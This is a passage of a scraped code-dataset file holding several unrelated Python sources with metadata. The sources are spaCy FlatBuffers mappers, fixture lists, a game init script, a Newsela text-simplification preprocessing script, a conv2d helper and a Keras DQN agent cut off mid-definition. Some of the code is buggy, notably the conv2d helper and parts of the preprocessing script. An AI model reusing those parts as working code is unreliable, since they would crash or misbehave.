SpacyBatchResponseMapper.to_dataclass(fb_obj))\n\n raise ValueError(\"unknown type\")\n\n\n@dataclass\nclass DEPSpacyResponseData:\n lang: str\n relation: str\n source: str\n source_pos: str\n source_index: int\n source_tag: str\n source_base: str\n target: str\n target_pos: str\n target_index: int\n target_tag: str\n target_base: str\n\n\nclass DEPSpacyResponseMapper:\n @staticmethod\n def serialize(entity: DEPSpacyResponseData, builder: Builder) -> Any:\n lang_offset_offset = builder.CreateString(entity.lang)\n relation_offset = builder.CreateString(entity.relation)\n source_offset = builder.CreateString(entity.source)\n source_pos_offset = builder.CreateString(entity.source_pos)\n source_tag_offset = builder.CreateString(entity.source_tag)\n source_base_offset = builder.CreateString(entity.source_base)\n target_offset = builder.CreateString(entity.target)\n target_pos_offset = builder.CreateString(entity.target_pos)\n target_tag_offset = builder.CreateString(entity.target_tag)\n target_base_offset = builder.CreateString(entity.target_base)\n\n DEPSpacyResponseClass.DEPSpacyResponseStart(builder)\n DEPSpacyResponseClass.DEPSpacyResponseAddLang(builder, lang_offset_offset)\n DEPSpacyResponseClass.DEPSpacyResponseAddRelation(builder, relation_offset)\n DEPSpacyResponseClass.DEPSpacyResponseAddSource(builder, source_offset)\n DEPSpacyResponseClass.DEPSpacyResponseAddSourcePos(builder, source_pos_offset)\n DEPSpacyResponseClass.DEPSpacyResponseAddSourceIndex(builder, entity.source_index)\n DEPSpacyResponseClass.DEPSpacyResponseAddSourceTag(builder, source_tag_offset)\n DEPSpacyResponseClass.DEPSpacyResponseAddSourceBase(builder, source_base_offset)\n DEPSpacyResponseClass.DEPSpacyResponseAddTarget(builder, target_offset)\n DEPSpacyResponseClass.DEPSpacyResponseAddTargetPos(builder, target_pos_offset)\n DEPSpacyResponseClass.DEPSpacyResponseAddTargetIndex(builder, entity.target_index)\n DEPSpacyResponseClass.DEPSpacyResponseAddTargetTag(builder, target_tag_offset)\n DEPSpacyResponseClass.DEPSpacyResponseAddTargetBase(builder, target_base_offset)\n\n return DEPSpacyResponseClass.DEPSpacyResponseEnd(builder)\n\n @staticmethod\n def to_dataclass(flatbuffer_object: DEPSpacyResponseClass.DEPSpacyResponse) -> DEPSpacyResponseData:\n return DEPSpacyResponseData(\n flatbuffer_object.Lang().decode(\"UTF-8\"),\n flatbuffer_object.Relation().decode(\"UTF-8\"),\n flatbuffer_object.Source().decode(\"UTF-8\"),\n flatbuffer_object.SourcePos().decode(\"UTF-8\"),\n 
flatbuffer_object.SourceIndex(),\n flatbuffer_object.SourceTag().decode(\"UTF-8\"),\n flatbuffer_object.SourceBase().decode(\"UTF-8\"),\n flatbuffer_object.Target().decode(\"UTF-8\"),\n flatbuffer_object.TargetPos().decode(\"UTF-8\"),\n flatbuffer_object.TargetIndex(),\n flatbuffer_object.TargetTag().decode(\"UTF-8\"),\n flatbuffer_object.TargetBase().decode(\"UTF-8\")\n )\n\n\n@dataclass\nclass NERSpacyResponseData:\n text: str\n start_char: int\n end_char: int\n label: str\n\n\nclass NERSpacyResponseMapper:\n @staticmethod\n def serialize(entity: NERSpacyResponseData, builder: Builder) -> Any:\n text_offset = builder.CreateString(entity.text)\n label_offset = builder.CreateString(entity.label)\n\n NERSpacyResponseClass.NERSpacyResponseStart(builder)\n NERSpacyResponseClass.NERSpacyResponseAddText(builder, text_offset)\n NERSpacyResponseClass.NERSpacyResponseAddStartChar(builder, entity.start_char)\n NERSpacyResponseClass.NERSpacyResponseAddEndChar(builder, entity.end_char)\n NERSpacyResponseClass.NERSpacyResponseAddLabel(builder, label_offset)\n\n return NERSpacyResponseClass.NERSpacyResponseEnd(builder)\n\n @staticmethod\n def to_dataclass(flatbuffer_object: NERSpacyResponseClass.NERSpacyResponse) -> NERSpacyResponseData:\n return NERSpacyResponseData(flatbuffer_object.Text().decode(\"UTF-8\"), flatbuffer_object.StartChar(),\n flatbuffer_object.EndChar(), flatbuffer_object.Label().decode(\"UTF-8\"))\n\n\nclass TypeData(Enum):\n DEP = 0\n NER = 1\n\n @staticmethod\n def from_value(value: int):\n for t in TypeData:\n if t.value == value:\n return t\n raise ValueError(f\"unknown value {value}\")\n\n\n@dataclass\nclass SpacyRequestData:\n text: str\n types: List[TypeData]\n\n\nclass SpacyRequestMapper:\n @staticmethod\n def serialize(entity: SpacyRequestData, builder: Builder) -> Any:\n text_offset = builder.CreateString(entity.text)\n SpacyRequestClass.SpacyRequestStartTypeVector(builder, len(entity.types))\n for x in reversed(entity.types):\n builder.PrependByte(x.value)\n types_offset = builder.EndVector(len(entity.types))\n\n SpacyRequestClass.SpacyRequestStart(builder)\n SpacyRequestClass.SpacyRequestAddText(builder, text_offset)\n SpacyRequestClass.SpacyRequestAddType(builder, types_offset)\n\n return SpacyRequestClass.SpacyRequestEnd(builder)\n\n @staticmethod\n def to_dataclass(flatbuffer_object: SpacyRequestClass.SpacyRequest) -> SpacyRequestData:\n types = list(map(lambda x: TypeData.from_value(x),\n map(lambda i: flatbuffer_object.Type(i), range(0, flatbuffer_object.TypeLength()))))\n return SpacyRequestData(flatbuffer_object.Text().decode(\"UTF-8\"), types)\n\n\n@dataclass\nclass SpacyBatchRequestData:\n requests: List[SpacyRequestData]\n\n\nclass SpacyBatchRequestMapper:\n @staticmethod\n def serialize(entity: SpacyBatchRequestData, builder: Builder) -> Any:\n requests_offsets = list(map(lambda r: SpacyRequestMapper.serialize(r, builder), entity.requests))\n SpacyBatchRequestClass.SpacyBatchRequestStartRequestsVector(builder, len(entity.requests))\n for offset in reversed(requests_offsets):\n builder.PrependUOffsetTRelative(offset)\n requests_vector_offset = builder.EndVector(len(entity.requests))\n SpacyBatchRequestClass.SpacyBatchRequestStart(builder)\n SpacyBatchRequestClass.SpacyBatchRequestAddRequests(builder, requests_vector_offset)\n\n return SpacyBatchRequestClass.SpacyBatchRequestEnd(builder)\n\n @staticmethod\n def to_dataclass(flatbuffer_object: SpacyBatchRequestClass.SpacyBatchRequest) -> SpacyBatchRequestData:\n requests = list(map(lambda r: 
SpacyRequestMapper.to_dataclass(r),\n map(lambda i: flatbuffer_object.Requests(i), range(0, flatbuffer_object.RequestsLength()))))\n return SpacyBatchRequestData(requests)\n\n\n@dataclass\nclass SpacyResponseData:\n ner: List[NERSpacyResponseData]\n dep: List[DEPSpacyResponseData]\n\n\nclass SpacyResponseMapper:\n @staticmethod\n def serialize(entity: SpacyResponseData, builder: Builder) -> Any:\n ner_offsets = list(map(lambda n: NERSpacyResponseMapper.serialize(n, builder), entity.ner))\n dep_offsets = list(map(lambda d: DEPSpacyResponseMapper.serialize(d, builder), entity.dep))\n SpacyResponseClass.SpacyResponseStartNerVector(builder, len(entity.ner))\n for x in reversed(ner_offsets):\n builder.PrependUOffsetTRelative(x)\n ner_vector_offset = builder.EndVector(len(entity.ner))\n\n SpacyResponseClass.SpacyResponseStartDepVector(builder, len(entity.dep))\n for x in reversed(dep_offsets):\n builder.PrependUOffsetTRelative(x)\n dep_vector_offset = builder.EndVector(len(entity.dep))\n\n SpacyResponseClass.SpacyResponseStart(builder)\n SpacyResponseClass.SpacyResponseAddNer(builder, ner_vector_offset)\n SpacyResponseClass.SpacyResponseAddDep(builder, dep_vector_offset)\n return SpacyResponseClass.SpacyResponseEnd(builder)\n\n @staticmethod\n def to_dataclass(flatbuffer_object: SpacyResponseClass.SpacyResponse) -> SpacyResponseData:\n ner = list(map(lambda n: NERSpacyResponseMapper.to_dataclass(n),\n map(lambda i: flatbuffer_object.Ner(i), range(0, flatbuffer_object.NerLength()))))\n\n dep = list(map(lambda d: DEPSpacyResponseMapper.to_dataclass(d),\n map(lambda i: flatbuffer_object.Dep(i), range(0, flatbuffer_object.DepLength()))))\n return SpacyResponseData(ner, dep)\n\n\n@dataclass\nclass SpacyBatchResponseData:\n responses: List[SpacyResponseData]\n\n\nclass SpacyBatchResponseMapper:\n @staticmethod\n def serialize(entity: SpacyBatchResponseData, builder: Builder) -> Any:\n responses_offsets = list(map(lambda r: SpacyResponseMapper.serialize(r, builder), entity.responses))\n SpacyBatchResponseClass.SpacyBatchResponseStartResponsesVector(builder, len(entity.responses))\n for offset in reversed(responses_offsets):\n builder.PrependUOffsetTRelative(offset)\n responses_vector_offset = builder.EndVector(len(entity.responses))\n\n SpacyBatchResponseClass.SpacyBatchResponseStart(builder)\n SpacyBatchResponseClass.SpacyBatchResponseAddResponses(builder, responses_vector_offset)\n return SpacyBatchResponseClass.SpacyBatchResponseEnd(builder)\n\n @staticmethod\n def to_dataclass(flatbuffer_object: SpacyBatchResponseClass.SpacyBatchResponse) -> SpacyBatchResponseData:\n responses = list(map(lambda x: SpacyResponseMapper.to_dataclass(x),\n map(lambda i: flatbuffer_object.Responses(i),\n range(0, flatbuffer_object.ResponsesLength()))))\n return SpacyBatchResponseData(responses)\n","sub_path":"python/keios-protocol-spacy/keios_protocol_spacy/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"530090339","text":"import datetime\nimport pytz\n\nclass multilist():\n \t#Reflects flag status lists\n \tlists = {\n \t\"none\" : [],\n \t\"ready\" : [],\n \t\"queue\" : [],\n \t\"valid\" : [],\n \t\"invalid\" : []\n \t}\n\n \tdef __init__(self, nonay, reaay, queay, valay, invay):\n \t\tself.lists[\"none\"] = nonay\n \t\tself.lists[\"ready\"] = reaay\n \t\tself.lists[\"queue\"] = queay\n \t\tself.lists[\"valid\"] = valay\n \t\tself.lists[\"invalid\"] = invay\n\nd = 
datetime.datetime(1998, 8, 12, 12, 32, 41)\ntimezone = pytz.timezone(\"America/Chicago\")\nd_aware = timezone.localize(d)\n\nnonay = [\n\t(\"mvol/0004/1905/0130\", d_aware),\n\t(\"mvol/0004/1905/0404\", d_aware),\n\t(\"mvol/0004/1920/1111\", d_aware),\n\t(\"mvol/0004/1930/0812\", d_aware),\n]\n\nreaay = [\n\t(\"mvol/0004/1905/0214\", d_aware),\n\t(\"mvol/0004/1930/0311\", d_aware),\n\t(\"mvol/0004/1930/1001\", d_aware),\n]\n\nqueay = [\n\t(\"mvol/0004/1905/0917\", d_aware),\n\t(\"mvol/0004/1930/0712\", d_aware),\n]\n\nvalay = [\n\t(\"mvol/0004/1920/1202\", d_aware)\n]\n\ninvay = [\n\t(\"mvol/0004/1920/0624\", d_aware)\n]\n\nyex = 0\n\nfor i in range (0, yex):\n\tnonay.append(((\"mvol/0004/1921/%s\" % '{0:04}'.format(i)), d_aware))\nfor i in range (0, yex):\n\treaay.append(((\"mvol/0004/1922/%s\" % '{0:04}'.format(i)), d_aware))\nfor i in range (0, yex):\n\tqueay.append(((\"mvol/0004/1923/%s\" % '{0:04}'.format(i)), d_aware))\nfor i in range (0, yex):\n\tvalay.append(((\"mvol/0004/1924/%s\" % '{0:04}'.format(i)), d_aware))\nfor i in range (0, yex):\n\tinvay.append(((\"mvol/0004/1925/%s\" % '{0:04}'.format(i)), d_aware))\t\t\t\t\n\nexmultilist = multilist(nonay, reaay, queay, valay, invay)","sub_path":"reportapp/reperrapp/listpage/multilist.py","file_name":"multilist.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"314694802","text":"import pickle\n\nfile = open(\"dontDeleteMe!!!\", mode = 'w')\nfile.close()\n\ndef __init__():\n data = [0, 0, 0, 0, 0]\n\n file = open(\"highScores.dat\", mode = 'wb')\n pickle.dump(data, file)\n file.close()\n\ndef run(fileName):\n file = open(str(fileName), mode = 'r')\n fileData = file.read()\n if str(fileData) == '':\n file = open(str(fileName), mode = 'w')\n file.write('Joanna is a silly donught')\n __init__()\n return True\n else:\n return False\n\nrun('dontDeleteMe!!!')\n","sub_path":"final/paddleGameInit.py","file_name":"paddleGameInit.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"523907640","text":"import spacy\nnlp = spacy.load('en')\nimport sys\nimport random\n\nbad_chars = [\"'\", '\"', \"-\", \"!\", \"@\", \"#\", \"$\", \"%\", \"^\", \"&\" , \"*\", \"(\", \")\", \\\n \"_\", \"+\", \"=\", \",\", \"\", \".\", \"?\", \"/\", \"\\\\\", \"~\", \"`\", \"{\", \"[\", \\\n \"}\", \"]\", \"|\", \":\", \";\"]\n\ndef contains_bad(token):\n for b in bad_chars:\n if b in token:\n return True\n return False\n\n## Performs tokenization and named-entity recognition on a sentence\ndef parse_sentence(sentence):\n doc = nlp(sentence)\n data = []\n tokens = [X.text for X in doc]\n for i in range(len(tokens)):\n if tokens[i] == \"''\":\n tokens[i] = '\"'\n elif tokens[i].lower() == \"-rrb-\":\n tokens[i] = \")\"\n elif tokens[i].lower() == \"-lrb-\":\n tokens[i] = \"(\"\n \n data.append(tokens)\n data.append([X.ent_iob_ for X in doc])\n data.append([X.ent_type_ for X in doc])\n\n return data\n\n## Performs only tokenization\ndef tokenize(text):\n tokens = [tok.text for tok in nlp.tokenizer(text)]\n for i in range(len(tokens)):\n if tokens[i] == \"''\":\n tokens[i] = '\"'\n elif tokens[i].lower() == \"-rrb-\":\n tokens[i] = \")\"\n elif tokens[i].lower() == \"-lrb-\":\n tokens[i] = \"(\"\n return tokens\n\n## Gets index of start of sublist in list, if sublist is found\ndef is_sublist(list1, list2):\n found = False\n indices = []\n for i in range(len(list2) - 
len(list1)):\n for j in range(len(list1)):\n if list1[j] != list2[i+j]:\n found = False\n indices = []\n break\n else:\n indices.append(i+j)\n found = True\n if found:\n return indices\n return []\n\n## Parses all sentences from a file \ndef get_sents(file):\n sents = []\n with open(file, 'r', encoding='utf8') as f:\n for line in f:\n sents.append(parse_sentence(line[:-1]))\n return sents\n\n## Gets original validation/test sentences\ndef get_original(original_folder, v_or_t):\n src_file = original_folder + \"V0V4_V1V4_V2V4_V3V4_V0V3_V0V2_V1V3.aner.ori.\" \\\n + v_or_t + \".src\"\n src_sents = get_sents(src_file)\n \n tgt_file = original_folder + \"V0V4_V1V4_V2V4_V3V4_V0V3_V0V2_V1V3.aner.ori.\" \\\n + v_or_t + \".dst\"\n tgt_sents = get_sents(tgt_file)\n\n return src_sents, tgt_sents\n\ndef analyze_v2(newsela_file):\n distribution = dict()\n for i in range(5):\n for j in range(i+1, 5):\n distribution[(i,j)] = 0\n \n with open(newsela_file, 'r', encoding='utf8') as f:\n for line in f:\n ls = line[:-1].split(\"\\t\")\n version_src = int(ls[0][1])\n version_tgt = int(ls[1][1])\n distribution[version_src, version_tgt] += 1\n\n print(distribution)\n\ndef analyze_v3(newsela_file):\n distribution = dict()\n for i in range(5):\n for j in range(i+1, 5):\n distribution[(i,j)] = 0\n \n with open(newsela_file, 'r', encoding='utf8') as f:\n i = 0\n for line in f:\n if i > 0:\n ls = line[:-1].split(\"\\t\")\n version_src = int(ls[0][1])\n version_tgt = int(ls[1][1])\n distribution[version_src, version_tgt] += 1\n i += 1\n\n print(distribution)\n \n \n\n## Parses all sentences from Newsela version 2\ndef get_v3_sents(newsela_file):\n source_sents = []\n target_sents = []\n\n orig_src = dict()\n orig_tgt = dict()\n\n bads = 0\n with open(newsela_file, 'r', encoding='utf8') as f:\n i = 0\n for line in f:\n if i % 1000 == 0:\n print(i)\n\n# if True:\n if i < 1000:\n if i > 0:\n ls = line[:-1].split(\"\\t\")\n version_src = int(ls[0][1])\n version_tgt = int(ls[1][1])\n\n sent_id = int(ls[9])\n\n sent_src = ls[15]\n sent_tgt = ls[16]\n\n if version_tgt - version_src > 1 or version_src == 3:\n src_parse = parse_sentence(sent_src)\n tgt_parse = [tokenize(sent_tgt), [], []]\n source_sents.append([src_parse, sent_id])\n target_sents.append([tgt_parse, sent_id])\n\n if ls[10] == \"N/A\":\n orig_src[sent_id] = src_parse[0]\n orig_tgt[sent_id] = tgt_parse[0]\n else:\n bads += 1\n else:\n break\n\n i += 1\n print(len(source_sents))\n print(len(list(orig_src.keys())))\n print(bads)\n return source_sents, target_sents, orig_src, orig_tgt\n \ndef get_train(source_sents, target_sents, orig_src, orig_tgt, valid_src, valid_tgt, test_src, test_tgt):\n s_tokens = []\n t_tokens = []\n\n ## Gets all validation and test sentences (tokenized)\n for i in range(len(valid_src)):\n s_tokens.append(valid_src[i][0])\n t_tokens.append(valid_tgt[i][0])\n\n for i in range(len(test_src)):\n s_tokens.append(test_src[i][0])\n t_tokens.append(test_tgt[i][0])\n\n print(s_tokens[0])\n print(t_tokens[0])\n\n ## Keeps pair if not found in validation or test set\n train_src = []\n train_tgt = []\n\n bads = 0\n for i in range(len(source_sents)):\n sent_id = source_sents[i][1]\n\n if i == 0:\n print(source_sents[i][0])\n print(target_sents[i][0])\n\n if orig_src[sent_id] not in s_tokens and orig_tgt[sent_id] not in t_tokens:\n train_src.append(source_sents[i][0])\n train_tgt.append(target_sents[i][0])\n else:\n bads += 1\n\n print(len(train_src))\n print(bads)\n return train_src, train_tgt\n\ndef align_sentences(newsela_v3_file, train_src, 
train_tgt):\n train_src_v3 = []\n train_tgt_v3 = []\n bads = 0\n bads2 = 0\n \n with open(newsela_v3_file, 'r', encoding='utf8') as f:\n c = 0\n for line in f:\n if c % 100000 == 0:\n print(c)\n c += 1\n\n if True:\n# if c < 10000:\n if c > 1:\n ls = line[:-1].split(\"\\t\")\n sent_id = int(ls[9])\n\n if ls[10] != \"N/A\":\n replaced_id_old = int(ls[11])\n\n try:\n orig_src = list(train_src[sent_id])\n orig_tgt = list(train_tgt[sent_id])\n\n if ls[10] == \"COMPLEX\":\n ## Finds replaced id\n new_src = tokenize(ls[15])\n if len(orig_src) == len(new_src):\n for i in range(len(new_src)):\n if new_src[i].lower() != orig_src[0][i].lower() \\\n and new_src[i] != \"--\" \\\n and len(new_src[i]) > 1:\n replaced_id = i\n break\n\n old_word = orig_src[0][replaced_id]\n replaced_word = new_src[replaced_id]\n orig_src[0][replaced_id] = replaced_word\n\n if True:\n print(\"COMPLEX: \" + str(c))\n print(replaced_word)\n print(old_word)\n print(\"\\n\")\n\n train_src_v3.append(orig_src)\n train_tgt_v3.append(orig_tgt)\n else:\n bads2 += 1\n else:\n ## Finds replaced id\n new_tgt = tokenize(ls[16])\n if len(orig_tgt) == len(new_tgt):\n for i in range(len(new_tgt)):\n if new_tgt[i].lower() != orig_tgt[0][i].lower() \\\n and new_src[i] != \"--\" \\\n and len(new_src[i]) > 1:\n replaced_id = i\n break\n \n replaced_word = new_tgt[replaced_id]\n orig_tgt[0][replaced_id] = replaced_word\n\n if True:\n print(\"SIMPLE: \" + str(c))\n print(replaced_word)\n print(replaced_id)\n print(\"\\n\")\n \n train_src_v3.append(orig_src)\n train_tgt_v3.append(orig_tgt)\n else:\n bads2 += 1\n \n except KeyError:\n bads += 1\n continue\n else:\n try:\n train_src_v3.append(train_src[sent_id])\n train_tgt_v3.append(train_tgt[sent_id])\n except KeyError:\n bads2 += 1\n continue\n else:\n break\n\n print(len(train_src_v3))\n print(bads)\n print(bads2)\n return train_src_v3, train_tgt_v3\n \n## Saves non-anonymized sentences\ndef save_original_data(data, output_file):\n with open(output_file, 'w', encoding='utf8') as f:\n for sent in data:\n f.write(\" \".join(sent[0]) + \"\\n\")\n\n## Anonymizes sentences\ndef anonymize_data(sents):\n anonymized_data = []\n\n for sent in sents:\n ori_tokens = sent[0]\n bio = sent[1]\n types = sent[2]\n\n all_nes = []\n all_types = []\n\n ## Groups all entities\n current_ne = []\n current_type = \"\"\n for i in range(len(ori_tokens)):\n if bio[i] == \"B\":\n if current_ne != []:\n all_nes.append(current_ne)\n all_types.append(current_type)\n current_ne = [i]\n current_type = types[i]\n elif bio[i] == \"I\":\n current_ne.append(i)\n else:\n if current_ne != []:\n all_nes.append(current_ne)\n all_types.append(current_type)\n current_ne = []\n current_type = \"\"\n if current_ne != []:\n all_nes.append(current_ne)\n all_types.append(current_type)\n\n ## Makes anonymized dictionary for sentence\n aner_dict = dict()\n ne_starts_dict = dict()\n for i in range(len(all_nes)):\n anonymized = False\n c = 1\n while not anonymized:\n try:\n a = aner_dict[all_types[i] + \"@\" + str(c)]\n c += 1\n except KeyError:\n aner_dict[all_types[i] + \"@\" + str(c)] = \" \".join([ori_tokens[j] for j in all_nes[i]])\n ne_starts_dict[all_nes[i][0]] = (all_nes[i], all_types[i] + \"@\" + str(c))\n anonymized = True\n \n ## Makes anonymized sentence\n anon_tokens = []\n i = 0\n while i < len(ori_tokens):\n if i not in ne_starts_dict.keys():\n anon_tokens.append(ori_tokens[i])\n i += 1\n else:\n ## Includes anonymized label\n current_ne_label = ne_starts_dict[i][1]\n anon_tokens.append(current_ne_label)\n\n ## Skips over 
indices that are part of named entity\n current_ne_indices = ne_starts_dict[i][0]\n for j in current_ne_indices:\n i += 1\n \n anonymized_data.append((anon_tokens, aner_dict)) \n return anonymized_data\n\n## Anonymizes target sentences\ndef anonymize_target_data(tgt_sents, src_aner):\n anonymized_data = []\n\n for i in range(len(tgt_sents)):\n if i == 0:\n print(tgt_sents[i])\n print(tgt_sents[i][0])\n print(src_aner[i][1])\n ori_tokens = tgt_sents[i][0]\n\n all_nes = []\n all_types = []\n\n ## Finds all named entities from complex sentence that\n ## are also found in the simple sentence\n for k,v in src_aner[i][1].items():\n ner = v.split(\" \")\n indices = is_sublist(ner, ori_tokens)\n\n if indices != []:\n all_nes.append(indices)\n all_types.append(k)\n\n ## Makes anonymized dictionary for sentence\n aner_dict = dict()\n ne_starts_dict = dict()\n for j in range(len(all_nes)):\n anonymized = False\n while not anonymized:\n try:\n a = aner_dict[all_types[j]]\n except KeyError:\n ne_starts_dict[all_nes[j][0]] = (all_nes[j], all_types[j])\n anonymized = True\n\n if i == 0:\n print(ori_tokens)\n \n ## Makes anonymized sentence\n anon_tokens = []\n j = 0\n while j < len(ori_tokens):\n if j not in ne_starts_dict.keys():\n anon_tokens.append(ori_tokens[j])\n j += 1\n else:\n ## Includes anonymized label\n current_ne_label = ne_starts_dict[j][1]\n anon_tokens.append(current_ne_label)\n\n ## Skips over indices that are part of named entity\n current_ne_indices = ne_starts_dict[j][0]\n for k in current_ne_indices:\n j += 1\n\n if i == 0:\n print(anon_tokens)\n print(\"\\n\")\n \n anonymized_data.append(anon_tokens) \n return anonymized_data\n\n## Saves anonymized sentences and anonymization mappings\ndef save_aner_data(anonymized_data, indices, output_file, anon_file):\n with open(output_file, 'w', encoding='utf8') as f:\n for i in indices:\n sent = []\n for s in anonymized_data[i][0]:\n if \"@\" not in s:\n sent.append(s.lower())\n else:\n sent.append(s.upper())\n f.write(\" \".join(sent) + \"\\n\")\n\n with open(anon_file, 'w', encoding='utf8') as f:\n for i in range(indices):\n anons = []\n for v,k in anonymized_data[i][1].items():\n anons.append(v.upper() + \"::\" + k)\n f.write(\"\\t\".join(anons) + \"\\n\")\n\n## Saves anonymized target sentences\ndef save_aner_tgt_data(anonymized_data, indices, output_file):\n with open(output_file, 'w', encoding='utf8') as f:\n for i in indices:\n sent = []\n for s in anonymized_data[i]:\n if \"@\" not in s:\n sent.append(s.lower())\n else:\n sent.append(s.upper())\n f.write(\" \".join(sent) + \"\\n\")\n \ndef main(newsela_file, newsela_v3_file, original_valid_folder, original_test_folder, output_folder):\n random.seed(37)\n# print(\"Analyzing Newsela v2 data...\")\n# analyze_v2(newsela_file)\n# print(\"Analyzing Newsela v3 data...\")\n# analyze_v3(newsela_v3_file)\n \n ## Parses all sentences from validation and test set\n print(\"Getting validation data...\")\n valid_src, valid_tgt = get_original(original_valid_folder, 'valid')\n print(\"Getting test data...\")\n test_src, test_tgt = get_original(original_test_folder, 'test')\n\n ## Parses all sentences from Newsela version 3\n print(\"Getting v2 data...\")\n source_sents, target_sents, orig_src, orig_tgt = get_v3_sents(newsela_v3_file)\n\n ## Only includes sentences not found in validation or test sentences\n print(\"Splitting training data...\")\n train_src, train_tgt = get_train(source_sents, target_sents, orig_src, orig_tgt, valid_src, \\\n valid_tgt, test_src, test_tgt)\n\n ## Aligns v3 with v3 
parses\n print(\"Getting v3 data...\")\n# train_src, train_tgt = align_sentences(newsela_v3_file, train_src, train_tgt)\n\n ## Saves original data\n print(\"Saving original data...\")\n save_original_data(train_src, output_folder + \"train/train.ori.src\")\n save_original_data(train_tgt, output_folder + \"train/train.ori.tgt\")\n save_original_data(valid_src, output_folder + \"valid/valid.ori.src\")\n save_original_data(valid_tgt, output_folder + \"valid/valid.ori.tgt\")\n save_original_data(test_src, output_folder + \"test/test.ori.src\")\n save_original_data(test_tgt, output_folder + \"test/test.ori.tgt\")\n \n ## Anonymizes data\n print(\"Anonymizing data...\")\n train_src_aner = anonymize_data(train_src)\n train_tgt_aner = anonymize_target_data(train_tgt, train_src_aner)\n valid_src_aner = anonymize_data(valid_src)\n valid_tgt_aner = anonymize_target_data(valid_tgt, valid_src_aner)\n test_src_aner = anonymize_data(test_src)\n test_tgt_aner = anonymize_target_data(test_tgt, test_src_aner)\n\n train_indices = [i for i in range(len(train_src_aner))]\n# random.shuffle(train_indices)\n valid_indices = [i for i in range(len(valid_src_aner))]\n test_indices = [i for i in range(len(test_src_aner))]\n \n ## Saves anonymized data\n print(\"Saving anonymized data...\")\n save_aner_data(train_src_aner, train_indices, output_folder + \"train/train.aner.src\", output_folder + \"train/train.src.aner_map\")\n save_aner_tgt_data(train_tgt_aner, train_indices, output_folder + \"train/train.aner.tgt\")\n save_aner_data(valid_src_aner, valid_indices, output_folder + \"valid/valid.aner.src\", output_folder + \"valid/valid.src.aner_map\")\n save_aner_tgt_data(valid_tgt_aner, valid_indices, output_folder + \"valid/valid.aner.tgt\")\n save_aner_data(test_src_aner, test_indices, output_folder + \"test/test.aner.src\", output_folder + \"test/test.src.aner_map\")\n save_aner_tgt_data(test_tgt_aner, test_indices, output_folder + \"test/test.aner.tgt\")\n \n \n \nif __name__ == '__main__':\n newsela_file = sys.argv[1]\n newsela_v3_file = sys.argv[2]\n original_valid_folder = sys.argv[3]\n original_test_folder = sys.argv[4]\n output_folder = sys.argv[5]\n main(newsela_file, newsela_v3_file, original_valid_folder, original_test_folder, output_folder)\n\n'''\nRunning on Tesla:\n\ncd ~/sockeye-recipes/new_scripts/preprocess_data/\n\npython3 prepare_Newsela_v3.py \\\n/data2/text_simplification/Newsela_v2/newsela_aligned_v2/newsela_pairs_v2.txt \\\n/data2/text_simplification/Newsela_v3/newsela_aligned_v3/newsela_pairs_v3.txt \\\n/data2/text_simplification/dataset/valid/ \\\n/data2/text_simplification/dataset/test/ \\\n/data2/text_simplification/Newsela_v3/\n'''\n","sub_path":"new_scripts/preprocess_data/prepare_Newsela_v3.py","file_name":"prepare_Newsela_v3.py","file_ext":"py","file_size_in_byte":19298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"169910593","text":"def batchConv2d(layer,kernel):\n out_dim = kernel.shape[1]\n kernel.contiguous().view([[-1]+list(kernel.shape[2:])])\n # mixing batch size and output dim\n layer =layer.view([1,-1] + list(layer.shape[2:]))\n # mixing batch size and input dim\n layer = F.conv2d(layer, kernel,groups=self.batchsize)\n layer= layer.view(self.batchsize,out_dim,layer.shape[2],x.shape[3])\n #unsqueezing the layer\n return layer","sub_path":"modules/untitled.py","file_name":"untitled.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} 
+{"seq_id":"102129770","text":"import os\nimport numpy as np\nimport gym\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv2D, Activation, Flatten\nfrom keras.optimizers import Adam\nfrom collections import deque\nimport random\nimport os\nimport time\n\nclass DQNAgent_5c:\n def __init__(self, env, memory_len = 10000):\n \n self.env = env\n self.agent_name = \"DQN_Agent_5c\"\n \n self.state_dim = self.env.observation_space.shape\n self.actions_dim = self.env.action_space.n\n \n self.n_features = np.prod(np.array(self.state_dim))\n \n self.memory_len = memory_len\n self.batch_size = 32\n\n self.learning_rate = 0.0001\n self.gamma = 0.99\n \n # using np array so that calculations are faster instead of dequeue\n self.memory = np.zeros((self.memory_len, 3 + self.n_features*2)) \n\n self.epsilon = 1.0\n self.epsilon_min = 0.05\n\n\n self.save_weights_cycle = 100\n self.start_after = 10\n self.update_cycle = 50\n self.learn_cycle = 1\n\n self.memory_counter = 0\n \n self.model_eval = self.build_model() \n self.model_target = self.build_model()\n\n print(\"===============================\")\n print(\"The agent\",self.agent_name,\"is initiallized with below parameter values.\")\n print(\"memory buffer limit:%i\\nbatch size:%i\\nlearning_rate:%.4f\\ngamma:%.2f\\n\" % (self.memory_len,self.batch_size,self.learning_rate, self.gamma))\n print(\"Below is the neural network used:\")\n print(self.model_eval.summary())\n print(\"===============================\")\n\n self.model_eval_path = \"model_eval_weights_\"\n self.model_target_path = \"model_target_weights_\"\n \n def build_model(self):\n\n kernel_initializer = keras.initializers.VarianceScaling(scale=1.0, mode='fan_in', distribution=\"normal\", seed=None)\n bias_initializer = \"zeros\"\n \n model = Sequential()\n \n model.add(Conv2D(input_shape=self.state_dim,data_format=\"channels_last\",\n filters=16, kernel_size=(8,8), strides=(4,4),\n padding=\"same\", activation=\"relu\",\n kernel_initializer=kernel_initializer))\n\n model.add(Conv2D(data_format=\"channels_last\",\n filters=32, kernel_size=(6,6), strides=(2,2),\n padding=\"same\", activation=\"relu\",\n kernel_initializer=kernel_initializer))\n \n model.add(Conv2D(data_format=\"channels_last\",\n filters=32, kernel_size=(4,4), strides=(1,1),\n padding=\"same\", activation=\"relu\",\n kernel_initializer=kernel_initializer))\n\n model.add(Conv2D(data_format=\"channels_last\",\n filters=64, kernel_size=(4,4), strides=(2,2),\n padding=\"same\", activation=\"relu\",\n kernel_initializer=kernel_initializer))\n \n 